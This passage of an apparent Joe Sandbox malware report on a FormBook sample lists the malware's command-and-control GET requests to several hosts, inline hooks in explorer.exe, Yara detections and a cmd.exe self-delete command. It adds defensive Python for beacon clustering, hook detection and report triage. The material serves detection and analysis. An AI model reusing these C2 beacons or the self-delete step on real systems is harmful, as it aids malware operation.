                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vatn3a84pvnuSV6HpSdXujsD77dVpc8NaTDjwR2I8GziSjJv4kODxMEpyJ0MBmLV052jHZUkvSsgoxUB/N1esw==
                                                                                  Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 61 74 6e 33 61 38 34 70 76 6e 75 53 56 36 48 70 53 64 58 75 6a 73 44 37 37 64 56 70 63 38 4e 61 54 44 6a 77 52 32 49 38 47 7a 69 53 6a 4a 76 34 6b 4f 44 78 4d 45 70 79 4a 30 4d 42 6d 4c 56 30 35 32 6a 48 5a 55 6b 76 53 73 67 6f 78 55 42 2f 4e 31 65 73 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 
64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                  Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vatn3a84pvnuSV6HpSdXujsD77dVpc8NaTDjwR2I8GziSjJv4kODxMEpyJ0MBmLV052jHZUkvSsgoxUB/N1esw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49737 | 35.169.40.107 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:17:03.163397074 CEST | 4371 | OUT | GET /ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp HTTP/1.1
Host: www.shamushalkowich.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:17:03.300910950 CEST | 4371 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Server: openresty
                                                                                  Date: Fri, 11 Jun 2021 10:17:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 166
                                                                                  Connection: close
                                                                                  Location: https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
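
The three sessions above are one request shape sent from explorer.exe to three unrelated hosts: GET /ccr/?FJB=<68-character base64-like token>&v0=JDK8Zp with Connection: close, the hosts answering with a WordPress redirect, a parked-domain page and an openresty redirect, which is consistent with most of them being decoys. The script below is an added example, not part of the Joe Sandbox report and not FormBook code: it reduces each URL in a proxy-style log to its campaign-invariant shape (path, parameter names in order, short constant values kept literally, long values replaced by a length and alphabet class) and flags any shape that recurs against several distinct hosts. The log line format, the benign filler lines, the process names treated as "system processes" and the threshold of two hosts are this example's assumptions; the three malicious lines are the report's own requests.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

BASE64ISH = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

# Constructed proxy-style log, one "<process> <method> <url>" per line.
# The first three URLs are the requests shown in the report; the rest are
# benign filler so the clustering has something to ignore.
SAMPLE_LOG = """\
C:\\Windows\\explorer.exe GET http://www.mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp
C:\\Windows\\explorer.exe GET http://www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp
C:\\Windows\\explorer.exe GET http://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp
C:\\Program Files\\Mozilla Firefox\\firefox.exe GET https://www.example.com/favicon.ico
C:\\Program Files\\Mozilla Firefox\\firefox.exe GET https://www.example.org/favicon.ico
C:\\Program Files\\Mozilla Firefox\\firefox.exe GET https://www.example.net/search?q=sandbox+report&page=2
"""


def request_shape(url):
    """Reduce a URL to the features that stay constant across C2 hosts:
    path, parameter names in order, literal values when short, otherwise a
    length/alphabet class. The 68-character base64-like FJB token and the
    fixed v0=JDK8Zp are what the three report requests have in common."""
    parts = urlsplit(url)
    shape = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        raw = value.replace(" ", "+")            # parse_qsl turns '+' into ' '
        if len(raw) <= 8:
            shape.append((name, "=" + raw))
        elif set(raw) <= BASE64ISH:
            shape.append((name, f"b64ish[{len(raw)}]"))
        else:
            shape.append((name, f"other[{len(raw)}]"))
    return parts.path, tuple(shape)


def parse_log(text):
    rows = []
    for line in text.splitlines():
        if line.strip():
            proc, method, url = line.rsplit(" ", 2)   # process path may contain spaces
            rows.append((proc, method, url))
    return rows


def find_beacon_clusters(rows, min_hosts=2):
    """Group GET requests by shape and return the shapes seen against at least
    min_hosts distinct hosts. Shapes without a query string are skipped: bare
    paths such as /favicon.ico recur on every host and would only add noise."""
    clusters = defaultdict(lambda: {"hosts": set(), "procs": set(), "count": 0})
    for proc, method, url in rows:
        if method != "GET":
            continue
        path, params = request_shape(url)
        if not params:
            continue
        c = clusters[(path, params)]
        c["hosts"].add(urlsplit(url).hostname)
        c["procs"].add(proc.rsplit("\\", 1)[-1].lower())
        c["count"] += 1
    return {shape: c for shape, c in clusters.items() if len(c["hosts"]) >= min_hosts}


def describe(clusters):
    """One line per suspicious shape; processes that have no business talking
    HTTP (explorer.exe in this report; the list is this example's own) get a tag."""
    lines = []
    for (path, params), c in clusters.items():
        query = "&".join(n + v if v.startswith("=") else f"{n}=<{v}>" for n, v in params)
        note = " [system process]" if c["procs"] & {"explorer.exe", "svchost.exe"} else ""
        lines.append(f"{path}?{query}  hosts={len(c['hosts'])} requests={c['count']} "
                     f"procs={','.join(sorted(c['procs']))}{note}")
    return lines


if __name__ == "__main__":
    for line in describe(find_beacon_clusters(parse_log(SAMPLE_LOG))):
        print(line)
```

Run against the constructed log it reports a single cluster, /ccr/?FJB=<b64ish[68]>&v0=JDK8Zp, seen against three hosts from explorer.exe. Keying on the shape rather than the hostnames matters because the domains in the report are disposable and most of them do not even belong to the operator; the originating process is the second strong signal, since explorer.exe issuing raw HTTP GETs is itself the "System process connects to network" finding at the top of this report.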


                                                                                  Code Manipulations

                                                                                  User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE2
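
The hook table is the output of one check: for each export of user32.dll, compare the first bytes of the function in the live explorer.exe with the same bytes in the clean module on disk, and report any difference together with the new bytes. The script below is an added example of that check, not code from the report or from FormBook. It works on two byte buffers laid out at their virtual offsets (so one RVA indexes both), lists every export whose prologue differs, and decodes the three trampoline forms an x64 inline hook normally starts with (jmp rel32, jmp [rip+disp32] with a pointer slot, and mov rax, imm64 ; jmp rax) to recover where the hook goes. The module base, export RVAs, injected-code address and prologue bytes are constructed; the six "New Data" bytes the report lists for GetMessageA are reused as-is to show how bytes that are not a recognised control transfer are reported.

```python
import struct

MASK64 = (1 << 64) - 1


def classify_hook(new_bytes, hook_va, mem_image, module_base):
    """Decode the trampoline forms an inline hook usually starts with and
    resolve where it goes. Returns (kind, target_va); target is None when
    the bytes are not a recognised control transfer."""
    if new_bytes[:1] == b"\xE9" and len(new_bytes) >= 5:                  # jmp rel32
        rel = struct.unpack_from("<i", new_bytes, 1)[0]
        return "jmp rel32", (hook_va + 5 + rel) & MASK64
    if new_bytes[:2] == b"\xFF\x25" and len(new_bytes) >= 6:              # jmp qword [rip+disp32]
        disp = struct.unpack_from("<i", new_bytes, 2)[0]
        slot_rva = (hook_va + 6 + disp) - module_base                     # pointer slot, often right after the jmp
        if 0 <= slot_rva and slot_rva + 8 <= len(mem_image):
            return "jmp [rip+disp32]", struct.unpack_from("<Q", mem_image, slot_rva)[0]
        return "jmp [rip+disp32]", None
    if new_bytes[:2] == b"\x48\xB8" and new_bytes[10:12] == b"\xFF\xE0":  # mov rax, imm64 ; jmp rax
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", new_bytes, 2)[0]
    return "unknown", None


def find_inline_hooks(disk_image, mem_image, exports, module_base, prologue_len=16):
    """Compare the first prologue_len bytes of every export in the clean on-disk
    image with the live in-process copy. Both buffers are assumed to be laid out
    at their virtual (section-aligned) offsets so one RVA indexes both; any
    difference is an inline hook."""
    hooks = []
    for name, rva in sorted(exports.items(), key=lambda kv: kv[1]):
        clean = bytes(disk_image[rva:rva + prologue_len])
        live = bytes(mem_image[rva:rva + prologue_len])
        if clean == live:
            continue
        kind, target = classify_hook(live, module_base + rva, mem_image, module_base)
        hooks.append({"function": name, "rva": rva, "kind": kind,
                      "target": target, "new": live[:6].hex(" ")})
    return hooks


# ---- constructed data standing in for user32.dll on disk and inside explorer.exe ----
MODULE_BASE = 0x7FFB12340000        # assumed load address of user32.dll
INJECTED_CODE = 0x0000000000910000  # assumed address of the injected handler, more than 2 GB below the module
EXPORTS = {"PeekMessageA": 0x1A00, "PeekMessageW": 0x1B00, "GetMessageW": 0x1C00,
           "GetMessageA": 0x1D00, "TranslateMessage": 0x1E00}   # RVAs are made up; TranslateMessage stays clean
# mov [rsp+8],rbx ; mov [rsp+10h],rsi ; push rdi ; sub rsp,20h  (an ordinary x64 prologue)
PROLOGUE = bytes.fromhex("48895C24084889742410574883EC20")


def build_images():
    disk = bytearray(b"\xCC" * 0x2000)
    for rva in EXPORTS.values():
        disk[rva:rva + len(PROLOGUE)] = PROLOGUE
    mem = bytearray(disk)
    # PeekMessageA: FF 25 00000000 followed by an absolute 8-byte pointer; reaches any address
    rva = EXPORTS["PeekMessageA"]
    mem[rva:rva + 14] = b"\xFF\x25\x00\x00\x00\x00" + struct.pack("<Q", INJECTED_CODE)
    # PeekMessageW: mov rax, imm64 ; jmp rax
    rva = EXPORTS["PeekMessageW"]
    mem[rva:rva + 12] = b"\x48\xB8" + struct.pack("<Q", INJECTED_CODE + 0x40) + b"\xFF\xE0"
    # GetMessageW: E9 rel32 to a trampoline inside the module (rel32 only spans +/-2 GB,
    # so a direct jump to INJECTED_CODE would not encode)
    rva = EXPORTS["GetMessageW"]
    mem[rva:rva + 5] = b"\xE9" + struct.pack("<i", (MODULE_BASE + 0x1F00) - (MODULE_BASE + rva + 5))
    # GetMessageA: the six "New Data" bytes the report lists; not a form decoded above
    rva = EXPORTS["GetMessageA"]
    mem[rva:rva + 6] = bytes.fromhex("488BB8899EE2")
    return disk, mem


if __name__ == "__main__":
    disk, mem = build_images()
    for h in find_inline_hooks(disk, mem, EXPORTS, MODULE_BASE):
        tgt = f"{h['target']:#x}" if h["target"] is not None else "?"
        print(f"{h['function']:<14} rva={h['rva']:#06x} {h['kind']:<24} -> {tgt}  [{h['new']}]")
```

On a live host the two buffers come from the file on disk, mapped section by section to its virtual layout, and from ReadProcessMemory on the target; on 32-bit modules apply the base relocations to the disk copy first, or every function whose first bytes contain an absolute address will look hooked. The report's own six bytes do not match any of the three trampoline forms, and the example deliberately does not guess at them: an unknown form is still reported, with its bytes, which is all the report does too.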

                                                                                  Statistics

                                                                                  Behavior


                                                                                  System Behavior

                                                                                  General

Start time: 12:15:10
Start date: 11/06/2021
Path: C:\Users\user\Desktop\444890321.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\444890321.exe'
Imagebase: 0x400000
File size: 245867 bytes
MD5 hash: F161FE51FEE0CD2F542EA759241C88CB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                  General

Start time: 12:15:11
Start date: 11/06/2021
Path: C:\Users\user\Desktop\444890321.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\444890321.exe'
Imagebase: 0x400000
File size: 245867 bytes
MD5 hash: F161FE51FEE0CD2F542EA759241C88CB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                  General

Start time: 12:15:11
Start date: 11/06/2021
Path: C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Imagebase: 0x7ff6741d0000
File size: 19352 bytes
MD5 hash: B7FC4A29431D4F795BBAB1FB182B759A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate

                                                                                  General

Start time: 12:15:17
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                  General

                                                                                  Start time:12:15:37
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\SysWOW64\autochk.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\SysWOW64\autochk.exe
                                                                                  Imagebase:0x2e0000
                                                                                  File size:871424 bytes
                                                                                  MD5 hash:34236DB574405291498BCD13D20C42EB
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:12:15:37
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                                                  Imagebase:0xa30000
                                                                                  File size:829856 bytes
                                                                                  MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:12:15:41
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\444890321.exe'
                                                                                  Imagebase:0x1e0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:12:15:42
                                                                                  Start date:11/06/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6b2800000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

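The process blocks above carry the observables worth pulling out of this report: a 32-bit WWAHost.exe started from SysWOW64 with FormBook Yara matches in its memory (one set of hits in a region whose protection field is 0x40, PAGE_EXECUTE_READWRITE, at 0x3230000; the other set in a 0x04, PAGE_READWRITE, region at 0x32E0000), followed by cmd.exe deleting the original sample. The Python below is an added example, not code from the report or from Joe Sandbox. It parses blocks in this key: value layout from a constructed excerpt, decodes the dump-name fields (reading them as process index, dump id, timestamp, base address, protection and region type is an assumption about the naming scheme; the protection values are the standard winnt.h PAGE_* constants) and emits one finding per Yara hit in executable memory plus one for the self-delete command.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input in the report's key: value layout: the WWAHost.exe and
# cmd.exe blocks, with two of the Yara bullet lines kept verbatim.
REPORT = r"""
General

Path: C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WWAHost.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

General

Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\444890321.exe'
"""

# Memory protection constants from winnt.h; the protection field of a dump name holds one.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # every PAGE_EXECUTE* value has one of these bits set

# Assumed field order: <process>.<dump>.<timestamp>.<base>.<protect>.<type>.sdmp
_SOURCE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
                     r"([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.IGNORECASE)
_YARA = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>[^,\s]+)")


@dataclass
class MemoryDump:
    process_index: int  # sandbox-assigned process index (assumed meaning of field 1)
    base: int           # base address of the dumped region (field 4)
    protection: int     # PAGE_* protection of the region (field 5)

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXECUTE_MASK)

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protection, hex(self.protection))


@dataclass
class YaraHit:
    rule: str
    dump: MemoryDump


@dataclass
class Process:
    path: str = ""
    commandline: str = ""
    wow64: bool = False
    yara: List[YaraHit] = field(default_factory=list)


def decode_source(src: str) -> MemoryDump:
    m = _SOURCE.match(src)
    if not m:
        raise ValueError(f"unrecognised dump name: {src}")
    return MemoryDump(int(m.group(1), 16), int(m.group(4), 16), int(m.group(5), 16))


def parse_report(text: str) -> List[Process]:
    procs: List[Process] = []
    cur: Optional[Process] = None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "General":          # every process block opens with this heading
            cur = Process()
            procs.append(cur)
        elif not line or cur is None:
            continue
        elif line.startswith("•"):     # one Yara match per bullet
            m = _YARA.search(line)
            if m:
                cur.yara.append(YaraHit(m["rule"].strip(), decode_source(m["src"])))
        else:
            key, _, value = line.partition(":")
            value = value.strip()
            if key == "Path":
                cur.path = value
            elif key == "Commandline":
                cur.commandline = value
            elif key == "Wow64 process (32bit)":
                cur.wow64 = value.lower() == "true"
    return procs


def triage(procs: List[Process], sample_name: str) -> List[str]:
    findings: List[str] = []
    for p in procs:
        exe = p.path.rsplit("\\", 1)[-1]
        for hit in p.yara:
            if hit.dump.executable:  # a hit in executable memory of a system binary: injected code
                findings.append(f"{exe} (sandbox process {hit.dump.process_index}): {hit.rule} "
                                f"in {hit.dump.protection_name} region at {hit.dump.base:#x}")
        if (exe.lower() == "cmd.exe" and re.search(r"/c\s+del\b", p.commandline, re.I)
                and sample_name.lower() in p.commandline.lower()):
            findings.append(f"self-delete of the original sample: cmd.exe {p.commandline}")
    return findings
```

On the excerpt, `triage(parse_report(REPORT), "444890321.exe")` returns two findings: the WWAHost.exe hit in the PAGE_EXECUTE_READWRITE region at 0x3230000 and the cmd.exe self-delete. The second WWAHost.exe hit, in PAGE_READWRITE memory, is parsed but not reported, which is the distinction a triage script should make: the executable region is the one to dump and unpack, the writable one is data.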
Disassembly

Code Analysis
